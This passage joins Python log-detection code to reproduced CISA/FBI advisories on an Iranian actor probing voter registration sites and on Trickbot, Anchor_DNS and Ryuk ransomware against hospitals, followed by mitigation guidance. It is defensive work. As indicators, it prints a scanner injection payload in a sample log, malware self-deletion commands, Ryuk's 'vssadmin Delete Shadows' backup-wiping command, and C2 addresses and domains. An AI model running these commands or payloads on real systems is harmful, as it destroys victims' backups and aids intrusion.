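            if marker in uri:
                hits.append({"c_ip": rec["c_ip"], "time": rec["date"] + " " + rec["time"],
                             "marker": marker, "user_agent": rec["cs_user_agent"]})
    return hits


def find_enumeration(lines: Iterable[str], min_run: int = 3) -> List[dict]:
    """Flag clients whose scripted user agent walked voterid values in increasing order."""
    by_client = defaultdict(list)
    for line in lines:
        rec = parse_iis_line(line)
        if rec is None or not rec["cs_user_agent"].startswith(SCRIPTED_AGENT_PREFIXES):
            continue
        m = VOTERID_RE.search(rec["cs_uri_query"])
        if not m:
            continue
        ts = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
        by_client[rec["c_ip"]].append((ts, int(m.group(2)), rec["cs_user_agent"]))

    findings = []
    for client, events in by_client.items():
        events.sort(key=lambda e: e[0])
        longest = run = 1
        for prev, cur in zip(events, events[1:]):
            run = run + 1 if cur[1] > prev[1] else 1   # strictly increasing ids
            longest = max(longest, run)
        if longest >= min_run:
            findings.append({
                "c_ip": client,
                "requests": len(events),
                "longest_increasing_run": longest,
                "span_seconds": (events[-1][0] - events[0][0]).total_seconds(),
                "user_agents": sorted({e[2] for e in events}),
            })
    return findings


# Constructed sample log (RFC 5737 documentation addresses, not real indicators).
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2020-09-26 13:12:56 10.0.0.5 GET /registration/details v[$acunetix]=1 443 - 198.51.100.7 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.21+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.21 - 200 0 0 0
2020-09-26 13:13:18 10.0.0.5 GET /registration/details voterid=;print(md5(acunetix_wvs_security_test)); 443 - 198.51.100.7 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.21+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.21 - 500 0 0 12
2020-10-17 13:07:51 10.0.0.5 GET /registration/details voterid=AB1001 443 - 203.0.113.9 curl/7.55.1 - 200 0 0 1406
2020-10-17 13:07:55 10.0.0.5 GET /registration/details voterid=AB1002 443 - 203.0.113.9 curl/7.55.1 - 200 0 0 1390
2020-10-17 13:07:58 10.0.0.5 GET /registration/details voterid=AB1003 443 - 203.0.113.9 curl/7.55.1 - 200 0 0 1625
2020-10-17 13:08:00 10.0.0.5 GET /registration/details voterid=AB1004 443 - 203.0.113.9 curl/7.55.1 - 200 0 0 1390
2020-10-17 13:09:12 10.0.0.5 GET /registration/details voterid=AB2231 443 - 192.0.2.44 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+Firefox/81.0 - 200 0 0 880
"""

if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    for hit in find_acunetix_hits(lines):
        print("acunetix marker:", hit)
    for finding in find_enumeration(lines):
        print("enumeration:", finding)
```
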

Indicators of Compromise

For a downloadable copy of IOCs, see AA20-304A.stix.

Disclaimer: Many of the IP addresses included below likely correspond to publicly available VPN services, which can be used by individuals all over the world. Although this creates the potential for false positives, any activity listed should warrant further investigation. The actor likely uses various IP addresses and VPN services.

The following IPs have been associated with this activity.


CISA and the FBI are aware the following IOCs have been used by this Iran-based actor. These IP addresses facilitated the mass dissemination of voter intimidation email messages on October 20, 2020.

Recommendations

The following list provides recommended self-protection mitigation strategies against cyber techniques used by advanced persistent threat actors: 

  • Validate input as a method of sanitizing untrusted input submitted by web application users. Validating input can significantly reduce the probability of successful exploitation by providing protection against security flaws in web applications. The types of attacks possibly prevented include SQL injection, Cross Site Scripting (XSS), and command injection.
  • Audit your network for systems using Remote Desktop Protocol (RDP) and other internet-facing services. Disable unnecessary services and install available patches for the services in use. Users may need to work with their technology vendors to confirm that patches will not affect system processes.
  • Verify all cloud-based virtual machine instances with a public IP, and avoid using open RDP ports, unless there is a valid need. Place any system with an open RDP port behind a firewall and require users to use a VPN to access it through the firewall.
  • Enable strong password requirements and account lockout policies to defend against brute-force attacks.
  • Apply multi-factor authentication, when possible.
  • Maintain a good information back-up strategy by routinely backing up all critical data and system configuration information on a separate device. Store the backups offline, verify their integrity, and verify the restoration process.
  • Enable logging and ensure logging mechanisms capture RDP logins. Keep logs for a minimum of 90 days and review them regularly to detect intrusion attempts.
  • When creating cloud-based virtual machines, adhere to the cloud provider's best practices for remote access.
  • Ensure third parties that require RDP access follow internal remote access policies.
  • Minimize network exposure for all control system devices. Where possible, critical devices should not have RDP enabled.
  • Regulate and limit external to internal RDP connections. When external access to internal resources is required, use secure methods, such as VPNs. However, recognize the security of VPNs matches the security of the connected devices.
  • Use security features provided by social media platforms; use strong passwords, change passwords frequently, and use a different password for each social media account. 
  • See CISA’s Tip on Best Practices for Securing Election Systems for more information.

General Mitigations

Keep applications and systems updated and patched

Apply all available software updates and patches and automate this process to the greatest extent possible (e.g., by using an update service provided directly from the vendor). Automating updates and patches is critical because of the speed with which threat actors create new exploits following the release of a patch. These “N-day” exploits can be as damaging as zero-day exploits. Ensure the authenticity and integrity of vendor updates by using signed updates delivered over protected links. Without the rapid and thorough application of patches, threat actors can operate inside a defender’s patch cycle. (See NSA, "NSA'S Top Ten Cybersecurity Mitigation Strategies": https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/csi-nsas-top10-cybersecurity-mitigation-strategies.pdf.) Additionally, use tools (e.g., the OWASP Dependency-Check Project tool, https://owasp.org/www-project-dependency-check/) to identify publicly known vulnerabilities in the third-party libraries the application depends on.

Scan web applications for SQL injection and other common web vulnerabilities

Implement a plan to scan public-facing web servers for common web vulnerabilities (e.g., SQL injection, cross-site scripting) by using a commercial web application vulnerability scanner in combination with a source code scanner. (See https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/defending-against-the-exploitation-of-sql-vulnerabilities-to.cfm.) Fixing or patching vulnerabilities after they are identified is especially crucial for networks hosting older web applications. As sites get older, more vulnerabilities are discovered and exposed.

Deploy a web application firewall  

Deploy a web application firewall (WAF) to prevent invalid input attacks and other attacks destined for the web application. WAFs are intrusion/detection/prevention devices that inspect each web request made to and from the web application to determine if the request is malicious. Some WAFs install on the host system and others are dedicated devices that sit in front of the web application. WAFs also weaken the effectiveness of automated web vulnerability scanning tools. 

Deploy techniques to protect against web shells

Patch web application vulnerabilities or fix configuration weaknesses that allow web shell attacks, and follow guidance on detecting and preventing web shell malware. (See NSA & ASD, "Cybersecurity Information: Detect and Prevent Web Shell Malware": https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF.) Malicious cyber actors often deploy web shells—software that can enable remote administration—on a victim’s web server. Malicious cyber actors can use web shells to execute arbitrary system commands commonly sent over HTTP or HTTPS. Attackers often create web shells by adding or modifying a file in an existing web application. Web shells provide attackers with persistent access to a compromised network using communications channels disguised to blend in with legitimate traffic. Web shell malware is a long-standing, pervasive threat that continues to evade many security tools. 

Use multi-factor authentication for administrator accounts

Prioritize protection for accounts with elevated privileges, remote access, or use on high-value assets. (See https://us-cert.cisa.gov/cdm/event/Identifying-and-Protecting-High-Value-Assets-Closer-Look-Governance-Needs-HVAs.) Use physical token-based authentication systems to supplement knowledge-based factors such as passwords and personal identification numbers (PINs). (See NSA, "NSA'S Top Ten Cybersecurity Mitigation Strategies": https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/csi-nsas-top10-cybersecurity-mitigation-strategies.pdf.) Organizations should migrate away from single-factor authentication, such as password-based systems, which are subject to poor user choices and more susceptible to credential theft, forgery, and password reuse across multiple systems.

Remediate critical web application security risks

First, identify and remediate critical web application security risks. Next, move on to other less critical vulnerabilities. Follow available guidance on securing web applications. (See NSA, “Building Web Applications – Security for Developers”: https://apps.nsa.gov/iaarchive/library/ia-guidance/security-tips/building-web-applications-security-recommendations-for.cfm; the OWASP Top Ten: https://owasp.org/www-project-top-ten/; and the 2020 CWE Top 25: https://cwe.mitre.org/top25/archive/2020/2020_cwe_top25.html.)

How do I respond to unauthorized access to election-related systems? Implement your security incident response and business continuity plan

It may take time for your organization’s IT professionals to isolate and remove threats to your systems and restore normal operations. In the meantime, take steps to maintain your organization’s essential functions according to your business continuity plan. Organizations should maintain and regularly test backup plans, disaster recovery plans, and business continuity procedures.

Contact CISA or law enforcement immediately 

To report an intrusion and to request incident response resources or technical assistance, contact CISA (Central@cisa.gov or 888-282-0870) or the FBI through a local field office or the FBI’s Cyber Division (CyWatch@ic.fbi.gov or 855-292-3937).

Revisions
  • October 30, 2020: Initial Version


October 29, 2020

AA20-302A: Ransomware Activity Targeting the Healthcare and Public Health Sector

Original release date: October 28, 2020
Summary

This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) version 7 framework. See the ATT&CK for Enterprise version 7 for all referenced threat actor tactics and techniques.

This joint cybersecurity advisory was coauthored by the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Department of Health and Human Services (HHS). This advisory describes the tactics, techniques, and procedures (TTPs) used by cybercriminals against targets in the Healthcare and Public Health Sector (HPH) to infect systems with Ryuk ransomware for financial gain.

CISA, FBI, and HHS have credible information of an increased and imminent cybercrime threat to U.S. hospitals and healthcare providers. CISA, FBI, and HHS are sharing this information to provide warning to healthcare providers to ensure that they take timely and reasonable precautions to protect their networks from these threats.


Key Findings
  • CISA, FBI, and HHS assess malicious cyber actors are targeting the HPH Sector with Trickbot malware, often leading to ransomware attacks, data theft, and the disruption of healthcare services.
  • These issues will be particularly challenging for organizations within the COVID-19 pandemic; therefore, administrators will need to balance this risk when determining their cybersecurity investments.
Technical Details

Threat Details

Since 2016, the cybercriminal enterprise behind Trickbot malware has continued to develop new functionality and tools increasing the ease, speed, and profitability of victimization. What began as a banking trojan and descendant of Dyre malware, now provides its operators a full suite of tools to conduct a myriad of illegal cyber activities. These activities include credential harvesting, mail exfiltration, cryptomining, point-of-sale data exfiltration, and the deployment of ransomware, such as Ryuk. In early 2019, the FBI began to observe new Trickbot modules named Anchor, which cyber actors typically used in attacks targeting high-profile victims—such as large corporations. These attacks often involved data exfiltration from networks and point-of-sale devices. As part of the new Anchor toolset, Trickbot developers created Anchor_DNS, a tool for sending and receiving data from victim machines using Domain Name System (DNS) tunneling.


Anchor_DNS is a backdoor that allows victim machines to communicate with command and control (C2) servers over DNS to evade typical network defense products and make their malicious communications blend in with legitimate DNS traffic. Anchor_DNS uses a single-byte XOR cipher to encrypt its communications, which have been observed using key 0xB9. Once decrypted, the string Anchor_DNS can be found in the DNS request traffic.

Trickbot Indicators of Compromise

After successful execution of the malware, Trickbot copies itself as an executable file with a 12-character (includes .exe), randomly generated file name (e.g. mfjdieks.exe) and places this file in one of the following directories.

  • C:\Windows\
  • C:\Windows\SysWOW64\
  • C:\Users\[Username]\AppData\Roaming\

The malware may also drop a file named anchorDiag.txt in one of the directories listed above.

Prior to initiating communications with the C2 server, the malware uses an infection marker of Global\fde345tyhoVGYHUJKIOuy, typically found in the running memory of the victim machine.

Part of the initial network communications with the C2 server involves sending information about the victim machine such as its computer name/hostname, operating system version, and build via a base64-encoded GUID. The GUID is composed of /GroupID/ClientID/ with the following naming convention:

/anchor_dns/[COMPUTERNAME]_[WindowsVersionBuildNo].[32CharacterString]/.
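A decoder for the Anchor_DNS client identifier described above (the 0xB9 single-byte XOR from the earlier paragraph and the /anchor_dns/ GUID layout), as an added example that is not the malware's code or any vendor's detection logic; it assumes the identifier is XOR-encoded first and then base64-encoded, an order the advisory does not state, and the sample identifier is constructed.

```python
"""Added example (not the malware's code): decode and recognise the Anchor_DNS
client identifier described above. Assumes the identifier is XOR-encoded with
the single-byte key 0xB9 and then base64-encoded before it is placed in DNS
traffic; the advisory gives the key and the base64 step but not their order."""
import base64
import re
from typing import Dict, Optional

ANCHOR_XOR_KEY = 0xB9  # key reported in the advisory

# Layout from the advisory:
# /anchor_dns/[COMPUTERNAME]_[WindowsVersionBuildNo].[32CharacterString]/
GUID_RE = re.compile(
    r"^/anchor_dns/(?P<host>[^_/]+)_(?P<build>.+)\.(?P<rand>[A-Za-z0-9]{32})/$")


def xor_bytes(data: bytes, key: int = ANCHOR_XOR_KEY) -> bytes:
    """Single-byte XOR; the same call encodes and decodes."""
    return bytes(b ^ key for b in data)


def encode_anchor_payload(text: str) -> str:
    """Inverse of decode_anchor_payload; used here only to build sample input."""
    return base64.b64encode(xor_bytes(text.encode("ascii"))).decode("ascii")


def decode_anchor_payload(encoded: str) -> Optional[str]:
    """Base64-decode (re-adding padding that DNS-carried data often drops),
    undo the XOR, and return the text if it is printable ASCII, else None."""
    padded = encoded + "=" * (-len(encoded) % 4)
    try:
        raw = base64.b64decode(padded, validate=True)
    except ValueError:              # binascii.Error is a ValueError subclass
        return None
    plain = xor_bytes(raw)
    if not plain or any(b < 0x20 or b > 0x7E for b in plain):
        return None
    return plain.decode("ascii")


def parse_anchor_guid(text: str) -> Optional[Dict[str, str]]:
    """Split a decoded identifier into host, build number and random suffix."""
    m = GUID_RE.match(text)
    return m.groupdict() if m else None


def inspect_dns_label(label: str) -> Optional[Dict[str, object]]:
    """Detection entry point: returns the decoded text and parsed fields when a
    label decodes to something containing the Anchor_DNS marker, else None."""
    text = decode_anchor_payload(label)
    if text is None or "anchor_dns" not in text.lower():
        return None
    return {"decoded": text, "guid": parse_anchor_guid(text)}


# Constructed sample identifier in the documented layout (hostname, build
# number and 32-character suffix are made up).
SAMPLE_GUID = "/anchor_dns/DESKTOP-EXAMPLE_10.0.19041.0123456789abcdef0123456789abcdef/"
SAMPLE_ENCODED = encode_anchor_payload(SAMPLE_GUID)

if __name__ == "__main__":
    print(inspect_dns_label(SAMPLE_ENCODED))   # parsed host/build/rand fields
    print(inspect_dns_label("www"))            # None: an ordinary label
```
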

The malware uses scheduled tasks that run every 15 minutes to ensure persistence on the victim machine. The scheduled task typically uses the following naming convention.

[random_folder_name_in_%APPDATA%_excluding_Microsoft]

autoupdate#[5_random_numbers] (e.g., Task autoupdate#16876).

After successful execution, Anchor_DNS further deploys malicious batch scripts (.bat) using PowerShell commands.

The malware deploys self-deletion techniques by executing the following commands.

  • cmd.exe /c timeout 3 && del C:\Users\[username]\[malware_sample]
  • cmd.exe /C PowerShell \"Start-Sleep 3; Remove-Item C:\Users\[username]\[malware_sample_location]\"

The following domains found in outbound DNS records are associated with Anchor_DNS.

  • kostunivo[.]com
  • chishir[.]com
  • mangoclone[.]com
  • onixcellent[.]com

This malware used the following legitimate domains to test internet connectivity.

  • ipecho[.]net
  • api[.]ipify[.]org
  • checkip[.]amazonaws[.]com
  • ip[.]anysrc[.]net
  • wtfismyip[.]com
  • ipinfo[.]io
  • icanhazip[.]com
  • myexternalip[.]com

The Anchor_DNS malware historically used the following C2 servers.

  • 23[.]95[.]97[.]59
  • 51[.]254[.]25[.]115
  • 193[.]183[.]98[.]66
  • 91[.]217[.]137[.]37
  • 87[.]98[.]175[.]85
Ryuk Ransomware

Typically Ryuk has been deployed as a payload from banking Trojans such as Trickbot. (See the United Kingdom (UK) National Cyber Security Centre (NCSC) advisory, Ryuk Ransomware Targeting Organisations Globally, on their ongoing investigation into global Ryuk ransomware campaigns and associated Emotet and TrickBot malware.) Ryuk first appeared in August 2018 as a derivative of Hermes 2.1 ransomware, which first emerged in late 2017 and was available for sale on the open market as of August 2018. Ryuk still retains some aspects of the Hermes code. For example, all of the files encrypted by Ryuk contain the HERMES tag but, in some infections, the files have .ryuk added to the filename, while others do not. In other parts of the ransomware code, Ryuk has removed or replaced features of Hermes, such as the restriction against targeting specific Eurasia-based systems.

While negotiating the victim network, Ryuk actors will commonly use commercial off-the-shelf products—such as Cobalt Strike and PowerShell Empire—in order to steal credentials. Both frameworks are very robust and are highly effective dual-purpose tools, allowing actors to dump clear text passwords or hash values from memory with the use of Mimikatz. This allows the actors to inject malicious dynamic-link libraries into memory with read, write, and execute permissions. In order to maintain persistence in the victim environment, Ryuk actors have been known to use scheduled tasks and service creation.

Ryuk actors will quickly map the network in order to enumerate the environment to understand the scope of the infection. In order to limit suspicious activity and possible detection, the actors choose to live off the land and, if possible, use native tools—such as net view, net computers, and ping—to locate mapped network shares, domain controllers, and Active Directory. In order to move laterally throughout the network, the group relies on native tools, such as PowerShell, Windows Management Instrumentation (WMI), Windows Remote Management, and Remote Desktop Protocol (RDP). The group also uses third-party tools, such as Bloodhound.

Once dropped, Ryuk uses AES-256 to encrypt files and an RSA public key to encrypt the AES key. The Ryuk dropper drops a .bat file that attempts to delete all backup files and Volume Shadow Copies (automatic backup snapshots made by Windows), preventing the victim from recovering encrypted files without the decryption program.

In addition, the attackers will attempt to shut down or uninstall security applications on the victim systems that might prevent the ransomware from executing. Normally this is done via a script, but if that fails, the attackers are capable of manually removing the applications that could stop the attack. The RyukReadMe file placed on the system after encryption provides either one or two email addresses, using the end-to-end encrypted email provider Protonmail, through which the victim can contact the attacker(s). While earlier versions provide a ransom amount in the initial notifications, Ryuk users are now designating a ransom amount only after the victim makes contact.

The victim is told how much to pay to a specified Bitcoin wallet for the decryptor and is provided a sample decryption of two files.

Initial testing indicates that the RyukReadMe file does not need to be present for the decryption script to run successfully but other reporting advises some files will not decrypt properly without it. Even if run correctly, there is no guarantee the decryptor will be effective. This is further complicated because the RyukReadMe file is deleted when the script is finished. This may affect the decryption script unless it is saved and stored in a different location before running.

According to MITRE, Ryuk uses the ATT&CK techniques listed in table 1.

Table 1: Ryuk ATT&CK techniques

System Network Configuration Discovery [T1016]: Ryuk has called GetIpNetTable in an attempt to identify all mounted drives and hosts that have Address Resolution Protocol entries.

Masquerading: Match Legitimate Name or Location [T1036.005]: Ryuk has constructed legitimate-appearing installation folder paths by calling GetWindowsDirectoryW and then inserting a null byte at the fourth character of the path. For Windows Vista or higher, the path would appear as C:\Users\Public.

Process Injection [T1055]: Ryuk has injected itself into remote processes to encrypt files using a combination of VirtualAlloc, WriteProcessMemory, and CreateRemoteThread.

Process Discovery [T1057]: Ryuk has called CreateToolhelp32Snapshot to enumerate all running processes.

Command and Scripting Interpreter: Windows Command Shell [T1059.003]: Ryuk has used cmd.exe to create a Registry entry to establish persistence.

File and Directory Discovery [T1083]: Ryuk has called GetLogicalDrives to enumerate all mounted drives, and GetDriveTypeW to determine the drive type.

Native API [T1106]: Ryuk has used multiple native APIs including ShellExecuteW to run executables; GetWindowsDirectoryW to create folders; and VirtualAlloc, WriteProcessMemory, and CreateRemoteThread for process injection.

Access Token Manipulation [T1134]: Ryuk has attempted to adjust its token privileges to have the SeDebugPrivilege.

Data Encrypted for Impact [T1486]: Ryuk has used a combination of symmetric and asymmetric encryption to encrypt files. Files have been encrypted with their own AES key and given a file extension of .RYK. Encrypted directories have had a ransom note of RyukReadMe.txt written to the directory.

Service Stop [T1489]: Ryuk has called kill.bat for stopping services, disabling services and killing processes.

Inhibit System Recovery [T1490]: Ryuk has used vssadmin Delete Shadows /all /quiet to delete volume shadow copies and vssadmin resize shadowstorage to force deletion of shadow copies created by third-party applications.

Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [T1047.001]: Ryuk has used the Windows command line to create a Registry entry under HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run to establish persistence.

Impair Defenses: Disable or Modify Tools [T1562.001]: Ryuk has stopped services related to anti-virus.

Mitigations

For a downloadable copy of IOCs, see AA20-302A.stix.

Plans and Policies

CISA, FBI, and HHS encourage HPH Sector organizations to maintain business continuity plans—the practice of executing essential functions through emergencies (e.g., cyberattacks)—to minimize service interruptions. Without planning, provision, and implementation of continuity principles, organizations may be unable to continue operations. Evaluating continuity and capability will help identify continuity gaps. Through identifying and addressing these gaps, organizations can establish a viable continuity program that will help keep them functioning during cyberattacks or other emergencies. CISA, FBI, and HHS suggest HPH Sector organizations review or establish patching plans, security policies, user agreements, and business continuity plans to ensure they address current threats posed by malicious cyber actors.

Network Best Practices
  • Patch operating systems, software, and firmware as soon as manufacturers release updates.
  • Check configurations for every operating system version for HPH organization-owned assets to prevent issues from arising that local users are unable to fix due to having local administration disabled.
  • Regularly change passwords to network systems and accounts and avoid reusing passwords for different accounts.
  • Use multi-factor authentication where possible.
  • Disable unused remote access/Remote Desktop Protocol (RDP) ports and monitor remote access/RDP logs.
  • Implement application and remote access allow listing to only allow systems to execute programs known and permitted by the established security policy.
  • Audit user accounts with administrative privileges and configure access controls with least privilege in mind.
  • Audit logs to ensure new accounts are legitimate.
  • Scan for open or listening ports and mediate those that are not needed.
  • Identify critical assets such as patient database servers, medical records, and telehealth and telework infrastructure; create backups of these systems and house the backups offline from the network.
  • Implement network segmentation. Sensitive data should not reside on the same server and network segment as the email environment.
  • Set antivirus and anti-malware solutions to automatically update; conduct regular scans.
Ransomware Best Practices

CISA, FBI and HHS do not recommend paying ransoms. Payment does not guarantee files will be recovered. It may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. In addition to implementing the above network best practices, the FBI, CISA and HHS also recommend the following:

  • Regularly back up data, air gap, and password protect backup copies offline.
  • Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, secure location.
User Awareness Best Practices
  • Focus on awareness and training. Because end users are targeted, make employees and stakeholders aware of the threats—such as ransomware and phishing scams—and how they are delivered. Additionally, provide users training on information security principles and techniques as well as overall emerging cybersecurity risks and vulnerabilities.
  • Ensure that employees know who to contact when they see suspicious activity or when they believe they have been a victim of a cyberattack. This will ensure that the proper established mitigation strategy can be employed quickly and efficiently.
Recommended Mitigation Measures

System administrators who have indicators of a Trickbot network compromise should immediately take steps to back up and secure sensitive or proprietary data. Trickbot infections may be indicators of an imminent ransomware attack; system administrators should take steps to secure network devices accordingly. Upon evidence of a Trickbot infection, review DNS logs and use the XOR key of 0xB9 to decode XOR encoded DNS requests to reveal the presence of Anchor_DNS, and maintain and provide relevant logs.
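As an added illustration of the DNS log review described above (example code written for this page, not part of the advisory or of any CISA tooling): it hex-decodes each DNS query label, XORs the result with the 0xB9 key, and reports queries whose decoded payload contains the Anchor_DNS marker string. The resolver log line format, the assumption that the encoded data travels hex-encoded inside a subdomain label, and the sample log lines are all constructed for the example.

```python
import re
from typing import List, Optional, Tuple

XOR_KEY = 0xB9          # single-byte XOR key named in the advisory
MARKER = b"anchor_dns"  # string expected to surface once a request is decoded


def xor_bytes(data: bytes, key: int = XOR_KEY) -> bytes:
    """Single-byte XOR; applying it twice restores the original bytes."""
    return bytes(b ^ key for b in data)


HEX_RE = re.compile(r"[0-9a-fA-F]+")


def decode_label(label: str) -> Optional[bytes]:
    """Hex-decode one DNS label and XOR it. Returns None for non-hex labels.

    Assumption: the encoded data is carried hex-encoded inside a subdomain
    label, which keeps it within the DNS hostname character set.
    """
    if len(label) % 2 or not HEX_RE.fullmatch(label):
        return None
    return xor_bytes(bytes.fromhex(label))


def decode_qname(qname: str) -> Optional[bytes]:
    """Return the decoded payload of the first label that contains the marker."""
    for label in qname.rstrip(".").split("."):
        decoded = decode_label(label)
        if decoded is not None and MARKER in decoded.lower():
            return decoded
    return None


# Assumed resolver log shape: "<timestamp> <client-ip> query: <qname>".
LOG_RE = re.compile(r"query:\s+(?P<qname>\S+)")


def find_anchor_dns(lines) -> List[Tuple[str, bytes]]:
    """Scan log lines; return (qname, decoded payload) for each Anchor_DNS hit."""
    hits: List[Tuple[str, bytes]] = []
    for line in lines:
        match = LOG_RE.search(line)
        if match is None:
            continue
        qname = match.group("qname")
        decoded = decode_qname(qname)
        if decoded is not None:
            hits.append((qname, decoded))
    return hits


def encode_payload(payload: bytes) -> str:
    """XOR then hex-encode. Used only to build the constructed sample below."""
    return xor_bytes(payload).hex()


# Constructed sample log (not real traffic). Line 2 carries an encoded label;
# line 3 is an innocuous hex-looking label that must not produce a hit.
SAMPLE_LOG = [
    "2020-10-27T14:02:11Z 10.0.0.15 query: www.example.com",
    "2020-10-27T14:02:12Z 10.0.0.15 query: "
    + encode_payload(b"/anchor_dns/host1/0/") + ".c2.example",
    "2020-10-27T14:02:13Z 10.0.0.15 query: 0a1b2c.cdn.example",
]

if __name__ == "__main__":
    for qname, payload in find_anchor_dns(SAMPLE_LOG):
        print(f"Anchor_DNS marker in {qname}: {payload!r}")
```

Only labels whose decoded bytes contain the marker are reported, so ordinary hex-looking labels (CDN hashes, cache-buster tokens) do not produce hits.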

GENERAL RANSOMWARE MITIGATIONS — HPH SECTOR

This section is based on CISA and Multi-State Information Sharing and Analysis Center (MS-ISAC)'s Joint Ransomware Guide, which can be found at https://www.cisa.gov/publication/ransomware-guide.

CISA, FBI, and HHS recommend that healthcare organizations implement both ransomware prevention and ransomware response measures immediately.

Ransomware Prevention

Join and Engage with Cybersecurity Organizations

CISA, FBI, and HHS recommend that healthcare organizations take the following initial steps:

Engaging with the H-ISAC, ISAO, CISA, FBI, and HHS/HC3 will enable your organization to receive critical information and access to services to better manage the risk posed by ransomware and other cyber threats.

Follow Ransomware Best Practices

Refer to the best practices and references below to help manage the risk posed by ransomware and support your organization’s coordinated and efficient response to a ransomware incident. Apply these practices to the greatest extent possible based on availability of organizational resources.

  • It is critical to maintain offline, encrypted backups of data and to regularly test your backups. Backup procedures should be conducted on a regular basis. It is important that backups be maintained offline or in separated networks as many ransomware variants attempt to find and delete any accessible backups. Maintaining offline, current backups is most critical because there is no need to pay a ransom for data that is readily accessible to your organization.
    • Use the 3-2-1 rule as a guideline for backup practices. The rule states that three copies of all critical data are retained on at least two different types of media and at least one of them is stored offline.
    • Maintain regularly updated “gold images” of critical systems in the event they need to be rebuilt. This entails maintaining image “templates” that include a preconfigured operating system (OS) and associated software applications that can be quickly deployed to rebuild a system, such as a virtual machine or server.
    • Retain backup hardware to rebuild systems in the event rebuilding the primary system is not preferred.
      • Hardware that is newer or older than the primary system can present installation or compatibility hurdles when rebuilding from images.
      • Ensure all backup hardware is properly patched.
  • In addition to system images, applicable source code or executables should be available (stored with backups, escrowed, license agreement to obtain, etc.). It is more efficient to rebuild from system images, but some images will not install on different hardware or platforms correctly; having separate access to needed software will help in these cases.
  • Create, maintain, and exercise a basic cyber incident response plan and associated communications plan that includes response and notification procedures for a ransomware incident.
  • Help your organization better organize around cyber incident response.
  • Develop a cyber incident response plan.
  • The Ransomware Response Checklist, available in the CISA and MS-ISAC Joint Ransomware Guide, serves as an adaptable, ransomware-specific annex to organizational cyber incident response or disruption plans.
  • Review and implement as applicable MITRE’s Medical Device Cybersecurity: Regional Incident Preparedness and Response Playbook (https://www.mitre.org/sites/default/files/publications/pr-18-1550-Medical-Device-Cybersecurity-Playbook.pdf).
  • Develop a risk management plan that maps critical health services and care to the necessary information systems; this will ensure that the incident response plan will contain the proper triage procedures.
  • Plan for the possibility of critical information systems being inaccessible for an extended period of time. This should include but not be limited to the following:
    • Print and properly store/protect hard copies of digital information that would be required for critical patient healthcare.
    • Plan for and periodically train staff to handle the re-routing of incoming/existing patients in an expedient manner if information systems were to abruptly and unexpectedly become unavailable.
    • Coordinate the potential for surge support with other healthcare facilities in the greater local area. This should include organizational leadership periodically meeting and collaborating with counterparts in the greater local area to create/update plans for their facilities to both abruptly send and receive a significant amount of critical patients for immediate care. This may include the opportunity to re-route healthcare employees (and possibly some equipment) to provide care along with additional patients.
  • Consider the development of a second, air-gapped communications network that can provide a minimum standard of backup support for hospital operations if the primary network becomes unavailable if/when needed.
  • Predefine network segments, IT capabilities and other functionality that can either be quickly separated from the greater network or shut down entirely without impacting operations of the rest of the IT infrastructure.
  • Legacy devices should be identified and inventoried with highest priority and given special consideration during a ransomware event.
  • See CISA and MS-ISAC's Joint Ransomware Guide for infection vectors including internet-facing vulnerabilities and misconfigurations; phishing; precursor malware infection; and third parties and managed service providers.
  • HHS/HC3 tracks ransomware that is targeting the HPH Sector; this information can be found at http://www.hhs.gov/hc3.
Hardening Guidance

Contact CISA for These No-Cost Resources
  • Information sharing with CISA and MS-ISAC (for SLTT organizations) includes bi-directional sharing of best practices and network defense information regarding ransomware trends and variants as well as malware that is a precursor to ransomware.
  • Policy-oriented or technical assessments help organizations understand how they can improve their defenses to avoid ransomware infection: https://www.cisa.gov/cyber-resource-hub.
    • Assessments include Vulnerability Scanning and Phishing Campaign Assessment.
  • Cyber exercises evaluate or help develop a cyber incident response plan in the context of a ransomware incident scenario.
  • CISA Cybersecurity Advisors (CSAs) advise on best practices and connect you with CISA resources to manage cyber risk.
  • Contacts:
Ransomware Quick References

Ransomware Response Checklist

Remember: Paying the ransom will not ensure your data is decrypted or that your systems or data will no longer be compromised. CISA, FBI, and HHS do not recommend paying ransom.

Should your organization be a victim of ransomware, CISA strongly recommends responding by using the Ransomware Response Checklist located in CISA and MS-ISAC's Joint Ransomware Guide, which contains steps for detection and analysis as well as containment and eradication.

Consider the Need For Extended Identification or Analysis
If extended identification or analysis is needed, CISA, HHS/HC3, or federal law enforcement may be interested in any of the following information that your organization determines it can legally share:
  • Recovered executable file
  • Copies of the readme file – DO NOT REMOVE the file or decryption may not be possible
  • Live memory (RAM) capture from systems with additional signs of compromise (use of exploit toolkits, RDP activity, additional files found locally)
  • Images of infected systems with additional signs of compromise (use of exploit toolkits, RDP activity, additional files found locally)
  • Malware samples
  • Names of any other malware identified on your system
  • Encrypted file samples
  • Log files (Windows Event Logs from compromised systems, Firewall logs, etc.)
  • Any PowerShell scripts found having executed on the systems
  • Any user accounts created in Active Directory or machines added to the network during the exploitation
  • Email addresses used by the attackers and any associated phishing emails
  • A copy of the ransom note
  • Ransom amount and whether or not the ransom was paid
  • Bitcoin wallets used by the attackers
  • Bitcoin wallets used to pay the ransom (if applicable)
  • Copies of any communications with attackers

